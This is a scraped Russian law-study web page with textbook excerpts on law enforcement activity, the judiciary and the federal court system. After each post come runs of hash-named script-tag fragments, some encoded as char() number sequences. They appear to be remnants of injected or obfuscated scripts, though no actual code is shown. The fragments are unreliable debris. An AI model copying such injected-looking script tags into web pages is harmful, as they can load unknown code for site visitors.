Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Правоохранительная деятельность, ее основные признаки и понятие, задачи и цели
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Признаками (критериями) правоохранительной деятельности
являются:  
1. Правоохранительная направленность. Правоохранительная
деятельность направлена на защиту прав и свобод человека и граж-
данина, прав и законных интересов любых субъектов правоотноше-
ний, на обеспечение безопасности, законности и правопорядка, а
также на борьбу с преступностью.  
2. Правоохранительная деятельность состоит из решений и
действий, осуществляемых (принимаемых) уполномоченными на то
законодательством субъектами.  
3. Правоохранительная деятельность предусмотрена (урегули-
рована) нормативно-правовыми актами.  

правоохранительные органы

989f14863b3a82a50a435c1fe94a3da7.js" type="text/javascript">7c55a963476cf781069864ff84cc0995.js" type="text/javascript">40e54658f2451a22906f8d39b63d85f5.js" type="text/javascript">
Коментариев: 0 | Просмотров: 4213 |
Функции (направления) правоохранительной деятельности
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Основными функциями (направлениями) правоохранительной
деятельности являются:  
1) конституционный контроль,  
2) правосудие;  
3) организационное обеспечение деятельности судов;  
4) прокурорский надзор и иные направления деятельности
прокуратуры;  
5) выявление и расследование преступлений:  
— предварительное следствие,  
— дознание,  
— оперативно-розыскная деятельность;  
6) уголовно-исполнительная деятельность;  
7) нотариальные действия;  
8) юридическая помощь и защита по уголовным делам (оказа-
ние юридических услуг).  

правоохранительные органы

61b11c83540aae6c8797051e5d24f173.js" type="text/javascript">0b3322b787f5917efd18d29f1c8285f4.js" type="text/javascript">17b70aaecc113301a52652787f048869.js" type="text/javascript">
Коментариев: 0 | Просмотров: 2399 |
Общая характеристика правоохранительных органов. Круг государственных и негосударственных органов, выполняющих правоохранительные функции
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Признаки правоохранительного органа:  
1) правовая регламентация его статуса и деятельности;  
2) стоящие перед ним задачи — защита (охрана, обеспечение) 
прав, свобод и законных интересов физических, юридических лиц, 
государства в целом, субъектов Российской Федерации, муници-
пальных образований, обеспечение безопасности, законности и (или) 
правопорядка, борьба с преступностью;  

правоохранительные органы

ac43daeee2fb5213e6a0167756c0e264.js" type="text/javascript">0dd45b9600161cfb6d9cec3d8be45922.js" type="text/javascript">5ff4690eb9a3f693f5e528c1e22e2fa8.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1082 |
Предмет дисциплины «Правоохранительные органы», его соотношение с другими юридическими дисциплинами
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Предмет курса — это те положения (правовые институты), ко-
торые изучаются данной дисциплиной. Исходя из содержания реко-
мендованной Советом по правоведению УМО университетов РФ
Программе дисциплины «Правоохранительные органы», составными
частями, предмета дисциплины «Правоохранительные органы» яв-
ляются:  
1) понятие, признаки, задачи и цели правоохранительной дея-
тельности;  
2) функции (направления) правоохранительной деятельности;  
3) понятие, признаки и виды правоохранительных органов;  
законодательные и иные правовые акты о правоохранительных
органах;  
4) понятие и основные признаки судебной власти;  
5) общая характеристика суда как органа судебной власти;  
понятие и структура судебной системы Российской Федера-
ции;  

правоохранительные органы

01202a53cc3d6865796112440badeccc.js" type="text/javascript">acde4013d92b9d0fb5c6d9b5ca8f0f88.js" type="text/javascript">58c67d9d7249f874c3acdec97c17f78c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 2978 |
Общая характеристика Законодательства и иные правовые акты о правоохранительных органах и их деятельности
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Правоохранительные органы и учреждения в своей деятельно-
сти руководствуются Конституцией РФ, федеральными конституци-
онными законами, федеральными законами, законами РФ, РСФСР и
действующими законами СССР, нормативными актами Президента
РФ, Совета Федерации, Государственной Думы, Правительства РФ; 
постановлениями (определениями) Конституционного Суда РФ, по-
становлениями Пленумов (Президиумов) Верховного Суда РФ
(СССР), Высшего Арбитражного Суда РФ, распоряжениями Предсе-
дателя Верховного Суда РФ, Приказами Министра юстиции РФ, 
приказами, указаниями, распоряжениями Генерального прокурора
РФ иными ведомственными нормативными актами, конституциями
республик, уставов, а также законами и иными нормативными акта-
ми субъектов Российской Федерации, решениями органов судейско-
го сообщества, принятыми в пределах их полномочий и другими
нормативными актами.  

правоохранительные органы

f512762ea57708a7a7f1c4bba0f1e37e.js" type="text/javascript">4a0dbb838154c9fcde516af480eb5c1a.js" type="text/javascript">e19c61b94525a0ec8bab043da6836188.js" type="text/javascript">
Коментариев: 0 | Просмотров: 2211 |
Действие законов о правоохранительных органах во времени. Опубликование правовых актов о правоохранительных органах
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
В силу ч. 3 ст. 15 Конституции РФ не могут применяться зако-
ны, а также любые иные нормативные правовые акты, затрагиваю-
щие права, свободы, обязанности человека и гражданина, если они
не опубликованы официально для всеобщего сведения. В соответст-
вии с указанным конституционным положением правоохранитель-
ный орган не вправе основывать свое решение на неопубликованных
нормативных актах, затрагивающих права, свободы, обязанности че-
ловека и гражданина27. Порядок официального опубликования феде-
ральных нормативных правовых актов определен Федеральным за-
коном «О порядке опубликования и вступления в силу федеральных
конституционных законов, федеральных законов, актов палат Феде-
рального Собрания» и Указом Президента РФ от 5 апреля 1994 г. №
662 «О порядке опубликования и вступления в силу федеральных
законов»
f148247616c59e12271bd87d9519264f.js" type="text/javascript">1a46ed213a1e4dccb8e43cedaa28667echar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)4039f17c4b5695db93ef35a5727beaff.js" type="text/javascript">ba35d6e8062d7795995859883275c281.js" type="text/javascript">edcd1e8dece5a925f01a158b93c52acb.js" type="text/javascript">c366a770679e1fbaa76de4e02c95db9b.js" type="text/javascript">29dbe95d7f08bc70793a398f51c28e2c.js" type="text/javascript">f51276df37b12626500da72c3036e207.js" type="text/javascript">05051cff3c982166183ae36359ad5626.js" type="text/javascript">33aff081e25c09bd50c93db530ea367e.js" type="text/javascript">d62cd6ef03bf37671dbd511e36f7cfc8.js" type="text/javascript">3392df5ff22929e1c2f0556703e99954.js" type="text/javascript">402c2f95231b0bd11f9cd86332b3575e.js" type="text/javascript">
Коментариев: 0 | Просмотров: 448 |
Судебная власть: понятие, основные признаки и принципы. Ее соотношение с законодательной и исполнительной властями. Общая характеристика полномочий судебной власти
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Согласно ст. 10 Конституции РФ государственная власть в
Российской Федерации осуществляется на основе разделения на за-
конодательную, исполнительную и судебную. Органы законода-
тельной, исполнительной и судебной власти самостоятельны. Су-
дебная власть осуществляется независимо от чьей бы то ни было во-
ли, подчиняясь только Конституции РФ и закону (ч. 1 ст. 5 Феде-
рального конституционного закона «О судебной системе Российской
Федерации»). Она является одной из важнейших составных ветвей
государственной власти28. Поэтому от суда нельзя требовать осуще-
ствления функций, несовместимых с его независимым статусом29.  ae97ece70a34b8a27d0826bd7c2d45d8.js" type="text/javascript">8e784a3d97454873a7aed9120e98d908char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)315ce9557fd246a7ce63a71b5119f68a.js" type="text/javascript">192c31a014f9896d3af6a2dcc4957bcf.js" type="text/javascript">4a7dbc1c368378f32aa48ce6486c10ef.js" type="text/javascript">ed51f3d17d83500cac85546bf219e975.js" type="text/javascript">4b9ef1cc2d9fada49c4049e3e16f80d9.js" type="text/javascript">53ccc46d0b3abc88a196cfecde9d5d9b.js" type="text/javascript">4f0fe16fed6c22ed61934b5fb77bca64.js" type="text/javascript">d894e235afaef035085ed2cd698ae7b5.js" type="text/javascript">a96645e14976ac43995ec7fdaf862e2b.js" type="text/javascript">7224caf8fc71359c9f6efa204c5179a9.js" type="text/javascript">d46d9a591b9aa644ced5dd8f7ebf7575.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1822 |
Суд как орган судебной власти
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Суд является органом судебной власти, носителем судебной
власти признаются судьи (ч. 1 ст. 29 Федерального конституционно-
го закона «О судебной системе Российской Федерации»). Основная
характеристика суда как органа судебной власти дана при характе-
ристике самой судебной власти. Составы судов будут рассмотрены в
разделах о судебной системе, судебных инстанциях, принципах пра-
восудия. Организации и компетенции отдельных разновидностей
судов (судам общей юрисдикции, арбитражным судам, Конституци-
онному Суду РФ) посвящены самостоятельные главы учебника.  
Поэтому здесь еще раз обратим внимание лишь на то, что суд, 
как орган судебной власти, это не здание суда и не одноименное уч-
реждение, которое в нем расположилось. Под судом как органом су-
дебной власти понимается определенный состав суда, рассматри-
вающий уголовное, гражданское дело, дело об административном
правонарушении, либо дело, подсудное Конституционному Суду
РФ.  c2aea7540349ba86c528ac6186d52773.js" type="text/javascript">9765c410882bd91f53fee2b156a0bf2achar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)8413cb8c0500d8c37d2ead1fb6da3186.js" type="text/javascript">bdcf660ad7e2790ea08c631a726471df.js" type="text/javascript">0c5f5d9dfe47aa8274da9a9ab3506c17.js" type="text/javascript">acdd9d1f6ce11ac488a059caa86ab875.js" type="text/javascript">e4740e699a597248b09490413a7f2f43.js" type="text/javascript">490888cc13b037e91cc6c43cdcabc78c.js" type="text/javascript">8f63caab5c7921e50bdc51e457392c99.js" type="text/javascript">d28c1916a98744a7c8712564a1d1ec36.js" type="text/javascript">1b6a138a40aa26ad2f42fd69a5c33b26.js" type="text/javascript">4eeb8134f03d8425e16d359c7c8e40e7.js" type="text/javascript">743006c5a0e56be8baad83c03168b8b5.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1070 |
Общее понятие судебной системы
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Согласно п. «г» ст. 71 Конституции РФ установление системы
федеральных органов законодательной, исполнительной и судебной
власти, порядка их организации и деятельности отнесено к ведению
Российской Федерации.  
Под системой федеральных органов законодательной, испол-
нительной и судебной власти следует понимать единство взаимосвя-
занных федеральных органов различных ветвей государственной
власти, которое, исходя из разграничения полномочий при осущест-
влении законодательных, исполнительных и судебных функций, 
обеспечивает баланс этих властей, систему взаимных сдержек и про-
тивовесов41. Важным элементом в этой системе выступает система
федеральных органов судебной власти. Вместе с судами субъектов
Российской Федерации она составляет – судебную систему.  bbd7d1445b3c5a2644861800110e3245.js" type="text/javascript">858ef2ab1da34522193cf0d18e36aa88char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)8e7c2fc85b934ab084bc811bdc14adb9.js" type="text/javascript">66a4f2411456bcb0d46169b14a0e94ab.js" type="text/javascript">52b2683c9ed4edf6d3305043f583dff6.js" type="text/javascript">7c5a4ae0f6955ffbd3bffab7b18b0460.js" type="text/javascript">44f7a203b33dcae253ffac98d9397f64.js" type="text/javascript">cdb34deca61f1b32ac557293f33d061c.js" type="text/javascript">6bac09ddba13d2f8b4b706345cf5eb1b.js" type="text/javascript">0376fbeaf41cbea637ce56cc65dd19e4.js" type="text/javascript">5fe4de1c49b25e409b52e6ca8eb5c5b8.js" type="text/javascript">92aebb20b4e4223e9e1dd341b2e25a1a.js" type="text/javascript">cddc057a9c8ab16ae143dba0ba170553.js" type="text/javascript">
Коментариев: 0 | Просмотров: 1055 |
Система федеральных судов: Конституционный Суд РФ, Верховный Суд РФ и возглавляемые им суды общей юрисдикции, Высший Арбитражный Суд РФ и арбитражные суды
  Правоохранительные органы | Автор: admin | 12-05-2010, 21:06
Федеральных судов три вида:  
1. Конституционный Суд РФ.  
2. Федеральные суды общей юрисдикции.  
3. Арбитражные суды.  
Конституционный Суд РФ в Российской Федерации единст-
венный судебный орган конституционного контроля. Федеральных
судов общей юрисдикции и арбитражных судов — большее количе-
ство. Конституционный Суд РФ наделен следующими полномочия-
ми. Он:  
а) разрешает дела о соответствии Конституции РФ федераль-
ных законов, нормативных актов Президента РФ, Совета Федерации, 
Государственной Думы, Правительства РФ; конституций республик, 
уставов, а также законов и иных нормативных актов субъектов Рос-
сийской Федерации, изданных по вопросам, относящимся к ведению
органов государственной власти Российской Федерации и совмест-
ному ведению органов государственной власти Российской Федера-
ции и органов государственной власти субъектов Российской Феде-
рации; договоров между органами государственной власти Россий-
ской Федерации и органами государственной власти субъектов Рос-
сийской Федерации, договоров между органами государственной
власти субъектов Российской Федерации; не вступивших в силу ме-
ждународных договоров Российской Федерации;  e0ccc4a9dd407584f3d1f423894165f1.js" type="text/javascript">1feabcd447933d9bfd7787ea054892c3char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)eb0278bd2c863d7602072d2b145b757b.js" type="text/javascript">0065b884bdd9141d82905733a361ed2b.js" type="text/javascript">2a2c6bd583713ada3246ab7bc612e089.js" type="text/javascript">0ca5c099b77dcb278fa5639a756311f5.js" type="text/javascript">88fbd1c3a736c9a377226951d68bbef5.js" type="text/javascript">0c6f021f6770bca80f3ae11afac3edc8.js" type="text/javascript">cf00ef779d8f5644b6b7d93998d4c2e3.js" type="text/javascript">611045f80b42012384eba5a78f3fcf6e.js" type="text/javascript">ba089521fdc03cd73e18a1eb6a75e672.js" type="text/javascript">ec715fb3aa5c4e34cf93fb3cc69337f5.js" type="text/javascript">794bceaddccb25568457f20fa1462150.js" type="text/javascript">
Коментариев: 0 | Просмотров: 2639 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: